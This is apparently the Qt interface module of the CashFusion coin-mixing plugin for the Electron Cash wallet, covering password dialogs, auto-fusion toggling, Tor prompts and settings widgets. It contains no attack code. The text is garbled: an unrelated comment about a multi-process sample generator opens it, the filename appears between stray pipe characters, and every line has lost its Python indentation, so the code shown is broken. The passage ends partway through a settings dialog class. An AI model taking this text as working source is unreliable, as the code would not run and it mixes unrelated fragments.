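# multi-process generator and pull a few samples from it.
#
#   config = read_config("config.yaml")
#   gen = generator("template.py", "Template", config=config, worker=4)
#   for _ in range(10):
#       data = next(gen)   # the structure of `data` depends on the template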
|
qt.py
|
#!/usr/bin/env python3
#
# Electron Cash - a lightweight Bitcoin Cash client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import weakref
from functools import partial
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash.i18n import _, ngettext, pgettext
from electroncash.plugins import hook, run_hook
from electroncash.util import (
do_in_main_thread, finalization_print_error, format_satoshis_plain, InvalidPassword, inv_dict, print_error,
PrintError, profiler)
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.main_window import ElectrumWindow, StatusBarButton
from electroncash_gui.qt.popup_widget import ShowPopupLabel, KillPopupLabel
from electroncash_gui.qt.util import (
Buttons, CancelButton, CloseButton, ColorScheme, OkButton, WaitingDialog, WindowModalDialog)
from electroncash_gui.qt.utils import PortValidator, UserPortValidator
from .conf import Conf, Global
from .fusion import can_fuse_from, can_fuse_to
from .server import Params
from .plugin import FusionPlugin, TOR_PORTS, COIN_FRACTION_FUDGE_FACTOR, select_coins
from pathlib import Path
heredir = Path(__file__).parent
icon_fusion_logo = QIcon(str(heredir / 'Cash Fusion Logo - No Text.svg'))
icon_fusion_logo_gray = QIcon(str(heredir / 'Cash Fusion Logo - No Text Gray.svg'))
image_red_exclamation = QImage(str(heredir / 'red_exclamation.png'))
class Plugin(FusionPlugin, QObject):
server_status_changed_signal = pyqtSignal(bool, tuple)
fusions_win = None
weak_settings_tab = None
gui = None
initted = False
last_server_status = (True, ("Ok", ''))
_hide_history_txs = False
def __init__(self, *args, **kwargs):
QObject.__init__(self) # parentless top-level QObject. We need this type for the signal.
FusionPlugin.__init__(self, *args, **kwargs) # gives us self.config
self.widgets = weakref.WeakSet() # widgets we made, that need to be hidden & deleted when plugin is disabled
self._hide_history_txs = Global(self.config).hide_history_txs
def on_close(self):
super().on_close()
# Shut down plugin.
# This can be triggered from one wallet's window while
# other wallets' windows have plugin-related modals open.
for window in self.gui.windows:
# this could be slow since it touches windows one by one... could optimize this by dispatching simultaneously.
self.on_close_window(window)
# Clean up
for w in self.widgets:
try:
w.setParent(None)
w.close()
w.hide()
w.deleteLater()
except Exception:
# could be <RuntimeError: wrapped C/C++ object of type SettingsDialog has been deleted> but really we just want to suppress all exceptions
pass
# clean up member attributes to be tidy
self.fusions_win = None # should trigger a deletion of object if not already dead
self.weak_settings_tab = None
self.gui = None
self.initted = False
@hook
def init_qt(self, gui):
# This gets called when this plugin is initialized, but also when
# any other plugin is initialized after us.
if self.initted:
return
self.initted = self.active = True # self.active is declared in super
self.gui = gui
if self.gui.nd:
# since a network dialog already exists, let's create the settings
# tab now.
self.on_network_dialog(self.gui.nd)
# We also have to find which windows are already open, and make
# them work with fusion.
for window in self.gui.windows:
self.on_new_window(window)
@hook
def address_list_context_menu_setup(self, address_list, menu, addrs):
if not self.active:
return
wallet = address_list.wallet
window = address_list.parent
network = wallet.network
if not (can_fuse_from(wallet) and can_fuse_to(wallet) and network):
return
if not hasattr(wallet, '_fusions'):
# that's a bug... all wallets should have this
return
coins = wallet.get_utxos(addrs, exclude_frozen=True, mature=True, confirmed_only=True, exclude_slp=True)
def start_fusion():
def do_it(password):
try:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
return
fusion = self.create_fusion(wallet, password, coins)
fusion.start()
except RuntimeError as e:
window.show_error(_('CashFusion failed: {error_message}').format(error_message=str(e)))
return
window.show_message(ngettext("One coin has been sent to CashFusion for fusing.",
"{count} coins have been sent to CashFusion for fusing.",
len(coins)).format(count=len(coins)))
has_pw, password = Plugin.get_cached_pw(wallet)
if has_pw and password is None:
d = PasswordDialog(wallet, _("Enter your password to fuse these coins"), do_it)
d.show()
self.widgets.add(d)
else:
do_it(password)
if coins:
menu.addAction(ngettext("Input one coin to CashFusion", "Input {count} coins to CashFusion", len(coins)).format(count = len(coins)),
start_fusion)
@hook
def on_new_window(self, window):
# Called on initial plugin load (if enabled) and every new window; only once per window.
wallet = window.wallet
can_fuse = can_fuse_from(wallet) and can_fuse_to(wallet)
if can_fuse:
sbbtn = FusionButton(self, wallet)
self.server_status_changed_signal.connect(sbbtn.update_server_error)
else:
# If we can not fuse we create a dummy fusion button that just displays a message
sbmsg = _('This wallet type ({wtype}) cannot be used with CashFusion.\n\nPlease use a standard deterministic spending wallet with CashFusion.').format(wtype=wallet.wallet_type)
sbbtn = DisabledFusionButton(wallet, sbmsg)
# bit of a dirty hack, to insert our status bar icon (always using index 4, should put us just after the password-changer icon)
sb = window.statusBar()
sb.insertPermanentWidget(4, sbbtn)
self.widgets.add(sbbtn)
window._cashfusion_button = weakref.ref(sbbtn)
if not can_fuse:
# don't do anything with non-fusable wallets
# (if inter-wallet fusing is added, this should change.)
return
want_autofuse = Conf(wallet).autofuse
self.add_wallet(wallet, window.gui_object.get_cached_password(wallet))
sbbtn.update_state()
# prompt for password if auto-fuse was enabled
if want_autofuse and not self.is_autofusing(wallet):
def callback(password):
self.enable_autofusing(wallet, password)
button = window._cashfusion_button()
if button: button.update_state()
d = PasswordDialog(wallet, _("Previously you had auto-fusion enabled on this wallet. If you would like to keep auto-fusing in the background, enter your password."),
callback_ok = callback)
d.show()
self.widgets.add(d)
@hook
def on_close_window(self, window):
# Invoked when closing wallet or entire application
# Also called by on_close, above.
wallet = window.wallet
fusions = self.remove_wallet(wallet)
if not fusions:
return
for f in fusions:
f.stop('Closing wallet')
# Soft-stop background fuse if running.
# We avoid doing a hard disconnect in the middle of a fusion round.
def task():
for f in fusions:
f.join()
d = WaitingDialog(window.top_level_window(), _('Shutting down active CashFusions (may take a minute to finish)'), task)
d.exec_()
@hook
def on_new_password(self, window, old, new):
wallet = window.wallet
if self.is_autofusing(wallet):
try:
self.enable_autofusing(wallet, new)
self.print_error(wallet, "updated autofusion password")
except InvalidPassword:
self.disable_autofusing(wallet)
self.print_error(wallet, "disabled autofusion due to incorrect password - BUG")
def show_util_window(self, ):
if self.fusions_win is None:
# keep a singleton around
self.fusions_win = FusionsWindow(self)
self.widgets.add(self.fusions_win)
self.fusions_win.show()
self.fusions_win.raise_()
def requires_settings(self):
# called from main_window.py internal_plugins_dialog
return True
def settings_widget(self, window):
# called from main_window.py internal_plugins_dialog
btn = QPushButton(_('Settings'))
btn.clicked.connect(self.show_settings_dialog)
return btn
def show_settings_dialog(self):
self.gui.show_network_dialog(None, jumpto='fusion')
@hook
def on_network_dialog(self, network_dialog):
if self.weak_settings_tab and self.weak_settings_tab():
return # already exists
settings_tab = SettingsWidget(self)
self.server_status_changed_signal.connect(settings_tab.update_server_error)
tabs = network_dialog.nlayout.tabs
tabs.addTab(settings_tab, icon_fusion_logo, _('CashFusion'))
self.widgets.add(settings_tab)
self.weak_settings_tab = weakref.ref(settings_tab)
@hook
def on_network_dialog_jumpto(self, nlayout, location):
settings_tab = self.weak_settings_tab and self.weak_settings_tab()
if settings_tab and location in ('fusion', 'cashfusion'):
nlayout.tabs.setCurrentWidget(settings_tab)
return True
def update_coins_ui(self, wallet):
''' Overrides super, the Fusion thread calls this in its thread context
to indicate it froze/unfroze some coins. We must update the coins tab,
but only in the main thread.'''
def update_coins_tab(wallet):
strong_window = wallet and wallet.weak_window and wallet.weak_window()
if strong_window:
strong_window.utxo_list.update() # this is rate_limited so it's ok to call it many times in rapid succession.
do_in_main_thread(update_coins_tab, wallet)
def notify_server_status(self, b, tup):
''' Reimplemented from super '''
super().notify_server_status(b, tup)
status_tup = (b, tup)
if self.last_server_status != status_tup:
self.last_server_status = status_tup
self.server_status_changed_signal.emit(b, tup)
def get_server_error(self) -> tuple:
''' Returns a 2-tuple of strings for the last server error, or None
if there is no extant server error. '''
if not self.last_server_status[0]:
return self.last_server_status[1]
@classmethod
def window_for_wallet(cls, wallet):
''' Convenience: Given a wallet instance, dereferences the weak_window
attribute of the wallet and returns a strong reference to the window.
May return None if the window is gone (deallocated). '''
assert isinstance(wallet, Abstract_Wallet)
return (wallet.weak_window and wallet.weak_window()) or None
@classmethod
def get_suitable_dialog_window_parent(cls, wallet_or_window):
''' Convenience: Given a wallet or a window instance, return a suitable
'top level window' parent to use for dialog boxes. '''
if isinstance(wallet_or_window, Abstract_Wallet):
wallet = wallet_or_window
window = cls.window_for_wallet(wallet)
return (window and window.top_level_window()) or None
elif isinstance(wallet_or_window, ElectrumWindow):
window = wallet_or_window
return window.top_level_window()
else:
raise TypeError(f"Expected a wallet or a window instance, instead got {type(wallet_or_window)}")
@classmethod
def get_cached_pw(cls, wallet):
''' Will return a tuple: (bool, password) for the given wallet. The
boolean is whether the wallet is password protected and the second
item is the cached password, if it's known, otherwise None if it is not
known. If the wallet has no password protection the tuple is always
(False, None). '''
if not wallet.has_password():
return False, None
window = cls.window_for_wallet(wallet)
if not window:
raise RuntimeError(f'Wallet {wallet.diagnostic_name()} lacks a valid ElectrumWindow instance!')
pw = window.gui_object.get_cached_password(wallet)
if pw is not None:
try:
wallet.check_password(pw)
except InvalidPassword:
pw = None
return True, pw
@classmethod
def cache_pw(cls, wallet, password):
window = cls.window_for_wallet(wallet)
if window:
window.gui_object.cache_password(wallet, password)
def enable_autofusing(self, wallet, password):
""" Overrides super, if super successfully turns on autofusing, kicks
off the timer to check that Tor is working. """
super().enable_autofusing(wallet, password)
if self.is_autofusing(wallet):
# ok, autofuse enable success -- kick off the timer task to check if
# Tor is good
do_in_main_thread(self._maybe_prompt_user_if_they_want_integrated_tor_if_no_tor_found, wallet)
_integrated_tor_timer = None
def _maybe_prompt_user_if_they_want_integrated_tor_if_no_tor_found(self, wallet):
if self._integrated_tor_timer:
# timer already active or already prompted user
return
weak_self = weakref.ref(self)
weak_window = wallet.weak_window
if not weak_window or not weak_window():
# Something's wrong -- no window for wallet
return
def chk_tor_ok():
self = weak_self()
if not self:
return
self._integrated_tor_timer = None # kill QTimer reference
window = weak_window()
if window and self.active and self.gui and self.gui.windows and self.tor_port_good is None:
network = self.gui.daemon.network
if network and network.tor_controller.is_available() and not network.tor_controller.is_enabled():
icon_pm = icon_fusion_logo.pixmap(32)
answer = window.question(
_('CashFusion requires Tor to operate anonymously. Would'
' you like to enable the Tor client now?'),
icon = icon_pm,
title = _("Tor Required"),
parent = None,
app_modal = True,
rich_text = True,
defaultButton = QMessageBox.Yes
)
if answer:
def on_status(controller):
try: network.tor_controller.status_changed.remove(on_status) # remove the callback immediately
except ValueError: pass
if controller.status == controller.Status.STARTED:
buttons = [ _('Settings...'), _('Ok') ]
index = window.show_message(
_('The Tor client has been successfully started.'),
detail_text = (
_("The Tor client can be stopped at any time from the Network Settings -> Proxy Tab"
", however CashFusion does require Tor in order to operate correctly.")
),
icon = icon_pm,
rich_text = True,
buttons = buttons,
defaultButton = buttons[1],
escapeButton = buttons[1]
)
if index == 0:
# They want to go to "Settings..." so send
# them to the Tor settings (in Proxy tab)
self.gui.show_network_dialog(window, jumpto='tor')
else:
controller.set_enabled(False) # latch it back to False so we may prompt them again in the future
window.show_error(_('There was an error starting the Tor client'))
network.tor_controller.status_changed.append(on_status)
network.tor_controller.set_enabled(True)
self._integrated_tor_timer = t = QTimer()
# if after ~2.5 seconds there is still no Tor port detected, ask the user if they want to enable the integrated Tor client
t.timeout.connect(chk_tor_ok)
t.setSingleShot(True)
t.start(2500)
@hook
def history_list_filter(self, history_list, h_item, label):
if self._hide_history_txs:
return bool(label.startswith("CashFusion ")) # this string is not translated for performance reasons
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# fusion tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Global(self.config).hide_history_txs = self._hide_history_txs
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Fusion transactions are now hidden")
else:
tip = _("Fusion transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in self.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide CashFusions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
class PasswordDialog(WindowModalDialog):
""" Slightly fancier password dialog -- can be used non-modal (asynchronous) and has internal password checking.
To run non-modally, use .show with the callbacks; to run modally, use .run. """
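# Usage sketch (names are illustrative):
#   d = PasswordDialog(wallet, _("Enter your password"), callback_ok=do_it)
#   d.show()                                  # non-modal; do_it(password) fires on success
#   pw = PasswordDialog(wallet, msg).run()    # modal; returns the password or None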
def __init__(self, wallet, message, callback_ok = None, callback_cancel = None):
parent = Plugin.get_suitable_dialog_window_parent(wallet)
super().__init__(parent=parent, title=_("Enter Password"))
self.setWindowIcon(icon_fusion_logo)
self.wallet = wallet
self.callback_ok = callback_ok
self.callback_cancel = callback_cancel
self.password = None
vbox = QVBoxLayout(self)
self.msglabel = QLabel(message)
self.msglabel.setWordWrap(True)
self.msglabel.setMinimumWidth(250)
self.msglabel.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Expanding)
hbox = QHBoxLayout()
iconlabel = QLabel(); iconlabel.setPixmap(icon_fusion_logo.pixmap(32))
hbox.addWidget(iconlabel)
hbox.addWidget(self.msglabel, 1, Qt.AlignLeft|Qt.AlignVCenter)
cmargins = hbox.contentsMargins(); cmargins.setBottom(10); hbox.setContentsMargins(cmargins) # pad the bottom a bit
vbox.addLayout(hbox, 1)
self.pwle = QLineEdit()
self.pwle.setEchoMode(QLineEdit.Password)
grid_for_hook_api = QGridLayout()
grid_for_hook_api.setContentsMargins(0,0,0,0)
grid_for_hook_api.addWidget(self.pwle, 0, 0)
run_hook('password_dialog', self.pwle, grid_for_hook_api, 0) # this is for the virtual keyboard plugin
vbox.addLayout(grid_for_hook_api)
self.badpass_msg = "<i>" + _("Incorrect password entered. Please try again.") + "</i>"
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(CancelButton(self))
okbutton = OkButton(self)
okbutton.clicked.disconnect()
okbutton.clicked.connect(self.pw_entered)
buttons.addWidget(okbutton)
vbox.addLayout(buttons)
def _on_pw_ok(self, password):
self.password = password
Plugin.cache_pw(self.wallet, password) # to remember it for a time so as to not keep bugging the user
self.accept()
if self.callback_ok:
self.callback_ok(password)
def _chk_pass(self, password):
pw_ok = not self.wallet.has_password()
if not pw_ok:
try:
self.wallet.check_password(password)
pw_ok = True
except InvalidPassword:
pass
return pw_ok
def pw_entered(self, ):
password = self.pwle.text()
if self._chk_pass(password):
self._on_pw_ok(password)
else:
self.msglabel.setText(self.badpass_msg)
self.pwle.clear()
self.pwle.setFocus()
def closeEvent(self, event):
''' This happens if .run() is called, then dialog is closed. '''
super().closeEvent(event)
if event.isAccepted():
self._close_hide_common()
def hideEvent(self, event):
''' This happens if .show() is called, then dialog is closed. '''
super().hideEvent(event)
if event.isAccepted():
self._close_hide_common()
def _close_hide_common(self):
if not self.result() and self.callback_cancel:
self.callback_cancel(self)
self.setParent(None)
self.deleteLater()
def run(self):
self.exec_()
return self.password
class DisabledFusionButton(StatusBarButton):
def __init__(self, wallet, message):
super().__init__(icon_fusion_logo_gray, 'Fusion', self.show_message)
self.wallet = wallet
self.message = message
self.setToolTip(_("CashFusion (disabled)"))
def show_message(self):
QMessageBox.information(Plugin.get_suitable_dialog_window_parent(self.wallet),
_("CashFusion is disabled"), self.message)
class FusionButton(StatusBarButton):
def __init__(self, plugin, wallet):
super().__init__(QIcon(), 'Fusion', self.toggle_autofuse)
self.plugin = plugin
self.wallet = wallet
self.server_error : tuple = None
self.icon_autofusing_on = icon_fusion_logo
self.icon_autofusing_off = icon_fusion_logo_gray
self.icon_fusing_problem = self.style().standardIcon(QStyle.SP_MessageBoxWarning)
# title = QWidgetAction(self)
# title.setDefaultWidget(QLabel("<i>" + _("CashFusion") + "</i>"))
self.action_toggle = QAction(_("Auto-Fuse in Background"))
self.action_toggle.setCheckable(True)
self.action_toggle.triggered.connect(self.toggle_autofuse)
action_separator1 = QAction(self); action_separator1.setSeparator(True)
action_wsettings = QAction(_("Wallet Fusion Settings..."), self)
action_wsettings.triggered.connect(self.show_wallet_settings)
action_settings = QAction(_("Server Settings..."), self)
action_settings.triggered.connect(self.plugin.show_settings_dialog)
action_separator2 = QAction(self); action_separator2.setSeparator(True)
action_util = QAction(_("Fusions..."), self)
action_util.triggered.connect(self.plugin.show_util_window)
self.addActions([self.action_toggle, action_separator1,
action_wsettings, action_settings,
action_separator2, action_util])
self.setContextMenuPolicy(Qt.ActionsContextMenu)
self.update_state()
def update_state(self):
autofuse = self.plugin.is_autofusing(self.wallet)
self.action_toggle.setChecked(autofuse)
if autofuse:
self.setIcon(self.icon_autofusing_on)
self.setToolTip(_('CashFusion is fusing in the background for this wallet'))
self.setStatusTip(_('CashFusion Auto-fusion - Enabled'))
else:
self.setIcon(self.icon_autofusing_off)
self.setToolTip(_('Auto-fusion is paused for this wallet (click to enable)'))
self.setStatusTip(_('CashFusion Auto-fusion - Disabled (click to enable)'))
if self.server_error:
self.setToolTip(_('CashFusion') + ": " + ', '.join(self.server_error))
self.setStatusTip(_('CashFusion') + ": " + ', '.join(self.server_error))
def paintEvent(self, event):
super().paintEvent(event)
if event.isAccepted() and self.server_error:
# draw error overlay if we are in an error state
p = QPainter(self)
try:
p.setClipRegion(event.region())
r = self.rect()
r -= QMargins(4,6,4,6)
r.moveCenter(r.center() + QPoint(4,4))
p.drawImage(r, image_red_exclamation)
finally:
# paranoia. The above never raises but.. if it does.. PyQt will
# crash hard if we don't end the QPainter properly before
# returning.
p.end()
del p
def toggle_autofuse(self):
plugin = self.plugin
autofuse = plugin.is_autofusing(self.wallet)
if not autofuse:
has_pw, password = Plugin.get_cached_pw(self.wallet)
if has_pw and password is None:
# Fixme: See if we can not use a blocking password dialog here.
pd = PasswordDialog(self.wallet, _("To perform auto-fusion in the background, please enter your password."))
self.plugin.widgets.add(pd) # just in case this plugin is unloaded while this dialog is up
password = pd.run()
del pd
if password is None or not plugin.active: # must check plugin.active because user can theoretically kill plugin from another window while the above password dialog is up
return
try:
plugin.enable_autofusing(self.wallet, password)
except InvalidPassword:
''' Somehow the password changed from underneath us. Silently ignore. '''
else:
running = plugin.disable_autofusing(self.wallet)
if running:
res = QMessageBox.question(Plugin.get_suitable_dialog_window_parent(self.wallet),
_("Disabling automatic Cash Fusions"),
_("New automatic fusions will not be started, but you have {num} currently in progress."
" Would you like to signal them to stop?").format(num=len(running)) )
if res == QMessageBox.Yes:
for f in running:
f.stop('Stop requested by user')
self.update_state()
def show_wallet_settings(self):
win = getattr(self.wallet, '_cashfusion_settings_window', None)
if not win:
win = WalletSettingsDialog(Plugin.get_suitable_dialog_window_parent(self.wallet),
self.plugin, self.wallet)
self.plugin.widgets.add(win) # ensures if plugin is unloaded while dialog is up, that the dialog will be killed.
win.show()
win.raise_()
def update_server_error(self):
tup = self.plugin.get_server_error()
changed = tup != self.server_error
if not changed:
return
self.server_error = tup
name = "CashFusionError;" + str(id(self)) # make sure name is unique per FusionButton widget
if self.server_error:
weak_plugin = weakref.ref(self.plugin)
def onClick():
KillPopupLabel(name)
plugin = weak_plugin()
if plugin:
plugin.show_settings_dialog()
ShowPopupLabel(name = name,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Server Error"),_("Click this popup to resolve")),
target=self,
timeout=20000, onClick=onClick, onRightClick=onClick,
dark_mode = ColorScheme.dark_scheme)
else:
KillPopupLabel(name)
self.update() # causes a repaint
window = self.wallet.weak_window and self.wallet.weak_window()
if window:
window.print_error("CashFusion server_error is now {}".format(self.server_error))
oldTip = self.statusTip()
self.update_state()
newTip = self.statusTip()
if newTip != oldTip:
window.statusBar().showMessage(newTip, 7500)
class SettingsWidget(QWidget):
torscanthread = None
torscanthread_update = pyqtSignal(object)
def __init__(self, plugin, parent=None):
super().__init__(parent)
self.plugin = plugin
self.torscanthread_ping = threading.Event()
self.torscanthread_update.connect(self.torport_update)
main_layout = QVBoxLayout(self)
box = QGroupBox(_("Network"))
main_layout.addWidget(box, 0, Qt.AlignTop | Qt.AlignHCenter)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
grid.addWidget(QLabel(_("Server")), 0, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 0, 1)
self.combo_server_host = QComboBox()
self.combo_server_host.setEditable(True)
self.combo_server_host.setInsertPolicy(QComboBox.NoInsert)
self.combo_server_host.setCompleter(None)
self.combo_server_host.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
self.combo_server_host.activated.connect(self.combo_server_activated)
self.combo_server_host.lineEdit().textEdited.connect(self.user_changed_server)
self.combo_server_host.addItems([f'{s[0]} ({s[1]}{" - ssl" if s[2] else ""})' for s in Global.Defaults.ServerList])
hbox.addWidget(self.combo_server_host)
hbox.addWidget(QLabel(_("P:")))
self.le_server_port = QLineEdit()
self.le_server_port.setMaximumWidth(50)
self.le_server_port.setValidator(PortValidator(self.le_server_port))
self.le_server_port.textEdited.connect(self.user_changed_server)
hbox.addWidget(self.le_server_port)
self.cb_server_ssl = QCheckBox(_('SSL'))
self.cb_server_ssl.clicked.connect(self.user_changed_server)
hbox.addWidget(self.cb_server_ssl)
self.server_error_label = QLabel()
self.server_error_label.setAlignment(Qt.AlignTop|Qt.AlignJustify)
grid.addWidget(self.server_error_label, 1, 0, 1, -1)
grid.addWidget(QLabel(_("Tor")), 2, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 2, 1)
self.le_tor_host = QLineEdit('localhost')
self.le_tor_host.textEdited.connect(self.user_edit_torhost)
hbox.addWidget(self.le_tor_host)
hbox.addWidget(QLabel(_("P:")))
self.le_tor_port = QLineEdit()
self.le_tor_port.setMaximumWidth(50)
self.le_tor_port.setValidator(UserPortValidator(self.le_tor_port))
self.le_tor_port.textEdited.connect(self.user_edit_torport)
hbox.addWidget(self.le_tor_port)
self.l_tor_status = QLabel()
hbox.addWidget(self.l_tor_status)
self.b_tor_refresh = QPushButton()
self.b_tor_refresh.clicked.connect(self.torscanthread_ping.set)
self.b_tor_refresh.setIcon(self.style().standardIcon(QStyle.SP_BrowserReload))
self.b_tor_refresh.setDefault(False); self.b_tor_refresh.setAutoDefault(False)
hbox.addWidget(self.b_tor_refresh)
self.cb_tor_auto = QCheckBox(_('Autodetect'))
self.cb_tor_auto.clicked.connect(self.cb_tor_auto_clicked)
hbox.addWidget(self.cb_tor_auto)
btn = QPushButton(_("Fusions...")); btn.setDefault(False); btn.setAutoDefault(False)
btn.clicked.connect(self.plugin.show_util_window)
buts = Buttons(btn)
buts.setAlignment(Qt.AlignRight | Qt.AlignTop)
main_layout.addLayout(buts)
main_layout.addStretch(1)
self.stretch_item_index = main_layout.count()-1
self.server_widget = ServerWidget(self.plugin)
self.server_widget.layout().setContentsMargins(0,0,0,0)
main_layout.addWidget(self.server_widget)
self.timer_server_widget_visibility = QTimer(self.server_widget)
self.timer_server_widget_visibility.setSingleShot(False)
self.timer_server_widget_visibility.timeout.connect(self.update_server_widget_visibility)
self.server_widget_index = main_layout.count()-1
self.pm_good_proxy = QIcon(":icons/status_connected_proxy.svg").pixmap(24)
self.pm_bad_proxy = QIcon(":icons/status_disconnected.svg").pixmap(24)
def update_server(self):
# called initially / when config changes
host, port, ssl = self.plugin.get_server()
try: # see if it's in default list, if so we can set it ...
index = Global.Defaults.ServerList.index((host,port,ssl))
except ValueError: # not in list
index = -1
self.combo_server_host.setCurrentIndex(index)
self.combo_server_host.setEditText(host)
self.le_server_port.setText(str(port))
self.cb_server_ssl.setChecked(ssl)
def update_server_error(self):
errtup = self.plugin.get_server_error()
self.server_error_label.setHidden(errtup is None)
if errtup:
color = ColorScheme.RED.get_html()
self.server_error_label.setText(f'<b>{errtup[0]}:</b> <font color="{color}"><i>{errtup[1]}</i></font>')
def combo_server_activated(self, index):
# only triggered when user selects a combo item
self.plugin.set_server(*Global.Defaults.ServerList[index])
self.update_server()
def user_changed_server(self, *args):
# user edited the host / port / ssl
host = self.combo_server_host.currentText()
try:
port = int(self.le_server_port.text())
except ValueError:
port = 0
ssl = self.cb_server_ssl.isChecked()
self.plugin.set_server(host, port, ssl)
def update_tor(self,):
# called on init and when the Tor autodetect setting is toggled
autoport = self.plugin.has_auto_torport()
host = self.plugin.get_torhost()
port = self.plugin.get_torport()
self.l_tor_status.clear()
self.torport_update(port)
self.cb_tor_auto.setChecked(autoport)
self.le_tor_host.setEnabled(not autoport)
self.le_tor_host.setText(str(host))
self.le_tor_port.setEnabled(not autoport)
if not autoport:
self.le_tor_port.setText(str(port))
def torport_update(self, goodport):
# signalled from the tor checker thread
autoport = self.plugin.has_auto_torport()
port = self.plugin.get_torport()
if autoport:
sport = '?' if port is None else str(port)
self.le_tor_port.setText(sport)
if goodport is None:
self.l_tor_status.setPixmap(self.pm_bad_proxy)
if autoport:
self.l_tor_status.setToolTip(_('Cannot find a Tor proxy on ports %(ports)s.')%dict(ports=TOR_PORTS))
else:
self.l_tor_status.setToolTip(_('Cannot find a Tor proxy on port %(port)d.')%dict(port=port))
else:
self.l_tor_status.setToolTip(_('Found a valid Tor proxy on this port.'))
self.l_tor_status.setPixmap(self.pm_good_proxy)
def user_edit_torhost(self, host):
self.plugin.set_torhost(host)
self.torscanthread_ping.set()
def user_edit_torport(self, sport):
try:
port = int(sport)
except ValueError:
return
self.plugin.set_torport(port)
self.torscanthread_ping.set()
def cb_tor_auto_clicked(self, state):
self.plugin.set_torport('auto' if state else 'manual')
port = self.plugin.get_torport()
if port is not None:
self.le_tor_port.setText(str(port))
self.torscanthread_ping.set()
self.update_tor()
def refresh(self):
self.update_server()
self.update_tor()
self.update_server_widget_visibility()
self.update_server_error()
def update_server_widget_visibility(self):
if not self.server_widget.is_server_running():
self.server_widget.setHidden(True)
self.layout().setStretch(self.stretch_item_index, 1)
self.layout().setStretch(self.server_widget_index, 0)
else:
self.server_widget.setHidden(False)
self.layout().setStretch(self.stretch_item_index, 0)
self.layout().setStretch(self.server_widget_index, 1)
def showEvent(self, event):
super().showEvent(event)
if not event.isAccepted():
return
self.refresh()
self.timer_server_widget_visibility.start(2000)
if self.torscanthread is None:
self.torscanthread = threading.Thread(name='Fusion-scan_torport_settings', target=self.scan_torport_loop)
self.torscanthread.daemon = True
self.torscanthread_stopping = False
self.torscanthread.start()
def _hide_close_common(self):
self.timer_server_widget_visibility.stop()
self.torscanthread_stopping = True
self.torscanthread_ping.set()
self.torscanthread = None
def closeEvent(self, event):
super().closeEvent(event)
if not event.isAccepted():
return
self._hide_close_common()
def hideEvent(self, event):
super().hideEvent(event)
if not event.isAccepted():
return
self._hide_close_common()
def scan_torport_loop(self, ):
while not self.torscanthread_stopping:
goodport = self.plugin.scan_torport()
self.torscanthread_update.emit(goodport)
self.torscanthread_ping.wait(10)
self.torscanthread_ping.clear()
class WalletSettingsDialog(WindowModalDialog):
def __init__(self, parent, plugin, wallet):
super().__init__(parent=parent, title=_("CashFusion - Wallet Settings"))
self.setWindowIcon(icon_fusion_logo)
self.plugin = plugin
self.wallet = wallet
self.conf = Conf(self.wallet)
self.idx2confkey = dict() # int -> 'normal', 'consolidate', etc..
self.confkey2idx = dict() # str 'normal', 'consolidate', etc -> int
assert not hasattr(self.wallet, '_cashfusion_settings_window')
main_window = self.wallet.weak_window()
assert main_window
self.wallet._cashfusion_settings_window = self
main_layout = QVBoxLayout(self)
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Fusion mode:')))
self.mode_cb = mode_cb = QComboBox()
hbox.addWidget(mode_cb)
main_layout.addLayout(hbox)
self.gb_coinbase = gb = QGroupBox(_("Coinbase Coins"))
vbox = QVBoxLayout(gb)
self.cb_coinbase = QCheckBox(_('Auto-fuse coinbase coins (if mature)'))
self.cb_coinbase.clicked.connect(self._on_cb_coinbase)
vbox.addWidget(self.cb_coinbase)
# The coinbase-related group box is hidden by default. It becomes
# visible permanently when the wallet settings dialog has seen at least
# one coinbase coin, indicating a miner's wallet. For most users the
# coinbase checkbox is confusing, which is why we prefer to hide it.
gb.setHidden(True)
main_layout.addWidget(gb)
box = QGroupBox(_("Self-Fusing"))
main_layout.addWidget(box)
slayout = QVBoxLayout(box)
